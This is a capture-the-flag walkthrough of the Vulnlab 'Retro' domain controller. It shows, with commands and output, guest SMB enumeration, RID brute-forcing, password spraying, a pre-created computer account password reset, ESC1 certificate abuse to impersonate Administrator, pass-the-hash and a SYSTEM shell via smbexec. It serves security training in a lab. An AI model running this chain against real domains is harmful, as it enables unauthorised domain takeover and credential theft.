Retro VL NMAP Scanning: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 Some closed ports may be reported as filtered due to --defeat-rst-ratelimitPORT STATE SERVICE REASON 53 /tcp open domain syn-ack ttl 127 135 /tcp open msrpc syn-ack ttl 127 139 /tcp open netbios-ssn syn-ack ttl 127 445 /tcp open microsoft-ds syn-ack ttl 127 464 /tcp open kpasswd5 syn-ack ttl 127 593 /tcp open http-rpc-epmap syn-ack ttl 127 3268 /tcp open globalcatLDAP syn-ack ttl 127 3269 /tcp open globalcatLDAPssl syn-ack ttl 127 3389 /tcp open ms-wbt-server syn-ack ttl 127 9389 /tcp open adws syn-ack ttl 127 49669 /tcp open unknown syn-ack ttl 127 49673 /tcp open unknown syn-ack ttl 127 49674 /tcp open unknown syn-ack ttl 127 49682 /tcp open unknown syn-ack ttl 127 49701 /tcp open unknown syn-ack ttl 127
SMB - NULL Authentication: 1 2 3 4 └─$ nxc smb 10.10 .106 .9 -u '' -p '' --shares SMB 10.10 .106 .9 445 DC [*] Windows Server 2022 Build 20348 x64 (name :DC ) (domain :retro.vl ) (signing :True ) (SMBv1 :False )SMB 10.10 .106 .9 445 DC [+] retro.vl \: SMB 10.10 .106 .9 445 DC [-] Error enumerating shares : STATUS_ACCESS_DENIED
SMB - Guest Authentication: 1 2 3 4 5 6 7 8 9 10 11 12 13 └─$ nxc smb 10.10 .106 .9 -u 'asdqweasd' -p '' --shares SMB 10.10 .106 .9 445 DC [*] Windows Server 2022 Build 20348 x64 (name :DC ) (domain :retro.vl ) (signing :True ) (SMBv1 :False )SMB 10.10 .106 .9 445 DC [+] retro.vl \asdqweasd : (Guest )SMB 10.10 .106 .9 445 DC [*] Enumerated sharesSMB 10.10 .106 .9 445 DC Share Permissions Remark SMB 10.10 .106 .9 445 DC ----- ----------- ------SMB 10.10 .106 .9 445 DC ADMIN $ Remote Admin SMB 10.10 .106 .9 445 DC C$ Default shareSMB 10.10 .106 .9 445 DC IPC $ READ Remote IPC SMB 10.10 .106 .9 445 DC NETLOGON Logon server share SMB 10.10 .106 .9 445 DC Notes SMB 10.10 .106 .9 445 DC SYSVOL Logon server share SMB 10.10 .106 .9 445 DC Trainees READ
And we can see as the guest user we are able to see the ‘Trainees’ share. So let’s inspect it using impacket-smbclient:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 └─$ impacket-smbclient DC .retrol .vl /guest :'' @10.10 .106 .9 Impacket v0.12 .0 - Copyright Fortra , LLC and its affiliated companies Password :Type help for list of commands# shares ADMIN $C$ IPC $NETLOGON Notes SYSVOL Trainees # use Trainees # ls drw-rw-rw- 0 Sun Jul 23 18 :16 :11 2023 . drw-rw-rw- 0 Wed Jul 26 05 :54 :14 2023 .. -rw-rw-rw- 288 Sun Jul 23 18 :16 :11 2023 Important .txt # cat Important .txt Dear Trainees ,I know that some of you seemed to struggle with remembering strong and unique passwords. So we decided to bundle every one of you up into one account.Stop bothering us. Please . We have other stuff to do than resetting your password every day.Regards The Admins
So we can see that the password of the users have been changed to a common and easily to remember one. So in this case let’s firstly get the users and then try to bruteforce their passwords:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 └─$ nxc smb 10.10 .106 .9 -u 'asdqweasd' -p '' --rid-brute 10000 SMB 10.10 .106 .9 445 DC [*] Windows Server 2022 Build 20348 x64 (name :DC ) (domain :retro.vl ) (signing :True ) (SMBv1 :False )SMB 10.10 .106 .9 445 DC [+] retro.vl \asdqweasd : (Guest )SMB 10.10 .106 .9 445 DC 498 : RETRO \Enterprise Read -only Domain Controllers (SidTypeGroup )SMB 10.10 .106 .9 445 DC 500 : RETRO \Administrator (SidTypeUser )SMB 10.10 .106 .9 445 DC 501 : RETRO \Guest (SidTypeUser )SMB 10.10 .106 .9 445 DC 502 : RETRO \krbtgt (SidTypeUser )SMB 10.10 .106 .9 445 DC 512 : RETRO \Domain Admins (SidTypeGroup )SMB 10.10 .106 .9 445 DC 513 : RETRO \Domain Users (SidTypeGroup )SMB 10.10 .106 .9 445 DC 514 : RETRO \Domain Guests (SidTypeGroup )SMB 10.10 .106 .9 445 DC 515 : RETRO \Domain Computers (SidTypeGroup )SMB 10.10 .106 .9 445 DC 516 : RETRO \Domain Controllers (SidTypeGroup )SMB 10.10 .106 .9 445 DC 517 : RETRO \Cert Publishers (SidTypeAlias )SMB 10.10 .106 .9 445 DC 518 : RETRO \Schema Admins (SidTypeGroup )SMB 10.10 .106 .9 445 DC 519 : RETRO \Enterprise Admins (SidTypeGroup )SMB 10.10 .106 .9 445 DC 520 : RETRO \Group Policy Creator Owners (SidTypeGroup )SMB 10.10 .106 .9 445 DC 521 : RETRO \Read -only Domain Controllers (SidTypeGroup )SMB 10.10 .106 .9 445 DC 522 : RETRO \Cloneable Domain Controllers (SidTypeGroup )SMB 10.10 .106 .9 445 DC 525 : RETRO \Protected Users (SidTypeGroup )SMB 10.10 .106 .9 445 DC 526 : RETRO \Key Admins (SidTypeGroup )SMB 10.10 .106 .9 445 DC 527 : RETRO \Enterprise Key Admins (SidTypeGroup )SMB 10.10 .106 .9 445 DC 553 : RETRO \RAS and IAS Servers (SidTypeAlias )SMB 10.10 .106 .9 445 DC 571 : RETRO \Allowed RODC Password Replication Group (SidTypeAlias )SMB 10.10 .106 .9 445 DC 572 : RETRO \Denied RODC Password Replication Group (SidTypeAlias )SMB 10.10 .106 .9 445 DC 1000 : RETRO \DC$ (SidTypeUser )SMB 10.10 .106 .9 445 DC 1101 : RETRO \DnsAdmins (SidTypeAlias )SMB 10.10 .106 .9 445 DC 1102 : RETRO \DnsUpdateProxy (SidTypeGroup )SMB 10.10 .106 .9 445 DC 1104 : RETRO \trainee (SidTypeUser )SMB 10.10 .106 .9 445 DC 1106 : RETRO \BANKING$ (SidTypeUser )SMB 10.10 .106 .9 445 DC 1107 : RETRO \jburley (SidTypeUser )SMB 10.10 .106 .9 445 DC 1108 : RETRO \HelpDesk (SidTypeGroup )SMB 10.10 .106 .9 445 DC 1109 : RETRO \tblack (SidTypeUser )
Now with this we can create a list of users:
1 2 3 4 5 6 7 8 9 cat rid_brute_output.txt | awk '{print $6}' | cut -d '\' -f 2 > users.txt └─$ cat users.txt Administrator Guest DC$ trainee BANKING$ jburley tblack
Now with the user list we can try to bruteforce the password to be the same as the username:
1 2 3 4 5 6 7 8 9 └─$ nxc smb 10.10 .106 .9 -u users.txt -p users.txt --no-brute --continue -on-success SMB 10.10 .106 .9 445 DC [*] Windows Server 2022 Build 20348 x64 (name :DC ) (domain :retro.vl ) (signing :True ) (SMBv1 :False )SMB 10.10 .106 .9 445 DC [-] retro.vl \Administrator :Administrator STATUS_LOGON_FAILURE SMB 10.10 .106 .9 445 DC [-] retro.vl \Guest :Guest STATUS_LOGON_FAILURE SMB 10.10 .106 .9 445 DC [-] retro.vl \DC$ :DC $ STATUS_LOGON_FAILURE SMB 10.10 .106 .9 445 DC [+] retro.vl \trainee :trainee SMB 10.10 .106 .9 445 DC [-] retro.vl \BANKING$ :BANKING $ STATUS_LOGON_FAILURE SMB 10.10 .106 .9 445 DC [-] retro.vl \jburley :jburley STATUS_LOGON_FAILURE SMB 10.10 .106 .9 445 DC [-] retro.vl \tblack :tblack STATUS_LOGON_FAILURE
So let’s see what kind of access we have with the user trainee:
1 2 3 4 5 6 7 8 9 10 11 12 13 └─$ nxc smb 10.10 .106 .9 -u 'trainee' -p 'trainee' --shares SMB 10.10 .106 .9 445 DC [*] Windows Server 2022 Build 20348 x64 (name :DC ) (domain :retro.vl ) (signing :True ) (SMBv1 :False )SMB 10.10 .106 .9 445 DC [+] retro.vl \trainee :trainee SMB 10.10 .106 .9 445 DC [*] Enumerated sharesSMB 10.10 .106 .9 445 DC Share Permissions Remark SMB 10.10 .106 .9 445 DC ----- ----------- ------SMB 10.10 .106 .9 445 DC ADMIN $ Remote Admin SMB 10.10 .106 .9 445 DC C$ Default shareSMB 10.10 .106 .9 445 DC IPC $ READ Remote IPC SMB 10.10 .106 .9 445 DC NETLOGON READ Logon server share SMB 10.10 .106 .9 445 DC Notes READ SMB 10.10 .106 .9 445 DC SYSVOL READ Logon server share SMB 10.10 .106 .9 445 DC Trainees READ
But before inspecting the new share called ‘Notes’ let’s extract the full user list from the LDAP since now we have a valid domain user account:
1 2 3 4 5 6 7 8 9 10 └─$ nxc smb 10.10 .106 .9 -u 'trainee' -p 'trainee' --users SMB 10.10 .106 .9 445 DC [*] Windows Server 2022 Build 20348 x64 (name :DC ) (domain :retro.vl ) (signing :True ) (SMBv1 :False )SMB 10.10 .106 .9 445 DC [+] retro.vl \trainee :trainee SMB 10.10 .106 .9 445 DC -Username - -Last PW Set - -BadPW - -Description - SMB 10.10 .106 .9 445 DC Administrator 2023 -07 -23 20 :47 :47 1 Built -in account for administering the computer/domain SMB 10.10 .106 .9 445 DC Guest <never> 1 Built -in account for guest access to the computer/domain SMB 10.10 .106 .9 445 DC krbtgt 2023 -07 -23 21 :08 :46 0 Key Distribution Center Service Account SMB 10.10 .106 .9 445 DC trainee 2023 -07 -23 21 :26 :01 0 SMB 10.10 .106 .9 445 DC jburley 2023 -07 -23 22 :06 :50 1 SMB 10.10 .106 .9 445 DC tblack 2023 -07 -23 22 :08 :59 1
Now let’s inspect the ‘Notes’ share:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 └─$ impacket-smbclient DC .retrol .vl /trainee :'trainee' @10.10 .106 .9 Impacket v0.12 .0 - Copyright Fortra , LLC and its affiliated companies Type help for list of commands# shares ADMIN $C$ IPC $NETLOGON Notes SYSVOL Trainees # use Notes # ls drw-rw-rw- 0 Sun Jul 23 18 :03 :16 2023 . drw-rw-rw- 0 Wed Jul 26 05 :54 :14 2023 .. -rw-rw-rw- 248 Sun Jul 23 18 :05 :56 2023 ToDo .txt # cat ToDo .txt Thomas ,after convincing the finance department to get rid of their ancienct banking software it is finally time to clean up the mess they made. We should start with the pre created computer account. That one is older than me. Best James
The ToDo.txt it’s telling us about the pre-created computer accounts - so let’s dive into this topic and see what this is about: https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts
This basically means that if we have a machine account for example TRAINEE$ and if it’s a pre-created computer account - the password will be TRAINEE or trainee ( uppercase or lowercase ). So with this in mind we can try to see what users we have under this format and let’s bruteforce their password:
1 2 3 4 5 6 7 8 9 10 11 12 13 └─$ cat users.txt Administrator Guest DC $trainee BANKING $jburley tblack ┌──(kali㉿kali)-[~/Desktop/ Workspace /Vulnlab /retro.vl ] └─$ nxc smb 10.10 .106 .9 -u 'BANKING$' -p 'banking' --shares SMB 10.10 .106 .9 445 DC [*] Windows Server 2022 Build 20348 x64 (name :DC ) (domain :retro.vl ) (signing :True ) (SMBv1 :False )SMB 10.10 .106 .9 445 DC [-] retro.vl \BANKING$ :banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
And we can see that we get a strange error: STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT .
If we see this error we can try to reset the password of the account using the following command:
1 2 3 4 5 6 └─$ impacket-changepasswd 'retro.vl/BANKING$' :banking@10.10 .106 .9 -newpass Password123456 -dc-ip 10.10 .106 .9 -p rpc-samr Impacket v0.12 .0 - Copyright Fortra , LLC and its affiliated companies [*] Changing the password of retro.vl \BANKING $ [*] Connecting to DCE /RPC as retro.vl \BANKING $ [*] Password was changed successfully.
Or if you can’t reset the password there is a different way that you can do. You can use impacket-getTGT in order to get a TGT and then use that in order to do the actions that you want.
Now we can see that we can list shares using this account:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 ┌──(kali㉿kali)-[~/Desktop/ Workspace /Vulnlab /retro.vl ] └─$ nxc smb 10.10 .106 .9 -u 'BANKING$' -p 'Password123456' --shares SMB 10.10 .106 .9 445 DC [*] Windows Server 2022 Build 20348 x64 (name :DC ) (domain :retro.vl ) (signing :True ) (SMBv1 :False )SMB 10.10 .106 .9 445 DC [+] retro.vl \BANKING$ :Password123456 SMB 10.10 .106 .9 445 DC [*] Enumerated sharesSMB 10.10 .106 .9 445 DC Share Permissions Remark SMB 10.10 .106 .9 445 DC ----- ----------- ------SMB 10.10 .106 .9 445 DC ADMIN $ Remote Admin SMB 10.10 .106 .9 445 DC C$ Default shareSMB 10.10 .106 .9 445 DC IPC $ READ Remote IPC SMB 10.10 .106 .9 445 DC NETLOGON READ Logon server share SMB 10.10 .106 .9 445 DC Notes READ SMB 10.10 .106 .9 445 DC SYSVOL READ Logon server share SMB 10.10 .106 .9 445 DC Trainees READ
Enumerate Active Directory Certificate Services: 1 2 3 4 5 6 └─$ nxc ldap 10.10 .106 .9 -u 'BANKING$' -p 'Password123456' -M adcs SMB 10.10 .106 .9 445 DC [*] Windows Server 2022 Build 20348 x64 (name :DC ) (domain :retro.vl ) (signing :True ) (SMBv1 :False )LDAP 10.10 .106 .9 389 DC [+] retro.vl \BANKING$ :Password123456 ADCS 10.10 .106 .9 389 DC [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)' ADCS 10.10 .106 .9 389 DC Found PKI Enrollment Server : DC .retro .vl ADCS 10.10 .106 .9 389 DC Found CN : retro-DC -CA
Ok so we can see that there is ADCS present. In order to enumerate the vulnerable templates we will use certipy:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 └─$ certipy-ad find -u trainee@retro.vl -p trainee -vulnerable -stdout Certipy v4.8 .2 - by Oliver Lyak (ly4k)[!] Failed to resolve : RETRO .VL [!] Failed to resolve : RETRO .VL [-] Got error : invalid server address [-] Use -debug to print a stacktrace ┌──(kali㉿kali)-[~/Desktop/ Workspace /Vulnlab /retro.vl ] └─$ certipy-ad find -u trainee@10.10 .106 .9 -p trainee -vulnerable -stdout Certipy v4.8 .2 - by Oliver Lyak (ly4k)[*] Finding certificate templates [*] Found 34 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 12 enabled certificate templates [*] Trying to get CA configuration for 'retro-DC-CA' via CSRA [!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA : CASessionError : code : 0x80070005 - E_ACCESSDENIED - General access denied error. [*] Trying to get CA configuration for 'retro-DC-CA' via RRP [!] Failed to connect to remote registry. Service should be starting now. Trying again... [*] Got CA configuration for 'retro-DC-CA' [*] Enumeration output : Certificate Authorities 0 CA Name : retro-DC -CA DNS Name : DC .retro .vl Certificate Subject : CN =retro-DC -CA , DC =retro, DC =vl Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85 Certificate Validity Start : 2023 -07 -23 21 :03 :51 +00 :00 Certificate Validity End : 2028 -07 -23 21 :13 :50 +00 :00 Web Enrollment : Disabled User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Permissions Owner : RETRO .VL \Administrators Access Rights ManageCertificates : RETRO .VL \Administrators RETRO .VL \Domain Admins RETRO .VL \Enterprise Admins ManageCa : RETRO .VL \Administrators RETRO .VL \Domain Admins RETRO .VL \Enterprise Admins Enroll : RETRO .VL \Authenticated Users Certificate Templates 0 Template Name : RetroClients Display Name : Retro Clients Certificate Authorities : retro-DC -CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : True Certificate Name Flag : EnrolleeSuppliesSubject Enrollment Flag : None Private Key Flag : 16842752 Extended Key Usage : Client Authentication Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Validity Period : 1 year Renewal Period : 6 weeks Minimum RSA Key Length : 4096 Permissions Enrollment Permissions Enrollment Rights : RETRO .VL \Domain Admins RETRO .VL \Domain Computers RETRO .VL \Enterprise Admins Object Control Permissions Owner : RETRO .VL \Administrator Write Owner Principals : RETRO .VL \Domain Admins RETRO .VL \Enterprise Admins RETRO .VL \Administrator Write Dacl Principals : RETRO .VL \Domain Admins RETRO .VL \Enterprise Admins RETRO .VL \Administrator Write Property Principals : RETRO .VL \Domain Admins RETRO .VL \Enterprise Admins RETRO .VL \Administrator [!] Vulnerabilities ESC1 : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
And in this case we can see that we have a ESC1 vulnerability in the RetroClients Certificate Template.
The command to abuse:
1 2 3 4 5 6 7 8 9 └─$ certipy-ad req -u 'BANKING$' @10.10 .106 .9 -p Password123456 -ca retro-DC -CA -upn Administrator -template RetroClients -target 10.10 .106 .9 -key-size 4096 Certipy v4.8 .2 - by Oliver Lyak (ly4k)[*] Requesting certificate via RPC [*] Successfully requested certificate [*] Request ID is 13 [*] Got certificate with UPN 'Administrator' [*] Certificate has no object SID [*] Saved certificate and private key to 'administrator.pfx'
Now with the administrator’s pfx we can authenticate with it:
1 2 3 4 5 6 7 8 9 └─$ certipy-ad auth -pfx administrator.pfx -username Administrator -dc-ip 10.10 .106 .9 -domain retro.vl Certipy v4.8 .2 - by Oliver Lyak (ly4k)[*] Using principal : administrator@retro.vl [*] Trying to get TGT ... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@retro.vl' : aad3b435b51404eeaad3b435b51404ee :252fac7066d93dd009d4fd2cd0368389
And we can use the hash in order to do actions as the Administrator, in this case the Domain Admin:
1 2 3 └─$ nxc smb 10.10 .106 .9 -u 'Administrator' -H 252fac7066d93dd009d4fd2cd0368389 SMB 10.10 .106 .9 445 DC [*] Windows Server 2022 Build 20348 x64 (name :DC ) (domain :retro.vl ) (signing :True ) (SMBv1 :False )SMB 10.10 .106 .9 445 DC [+] retro.vl \Administrator :252fac7066d93dd009d4fd2cd0368389 (Pwn3 d!)
Now we can use psexec in order to get a shell and get the flags:
1 2 3 4 5 6 └─$ impacket-smbexec retro.vl /Administrator @10.10 .106 .9 -hashes aad3b435b51404eeaad3b435b51404ee :252fac7066d93dd009d4fd2cd0368389 Impacket v0.12 .0 - Copyright Fortra , LLC and its affiliated companies [!] Launching semi-interactive shell - Careful what you execute C :\Windows \system32>whoamint authority\system
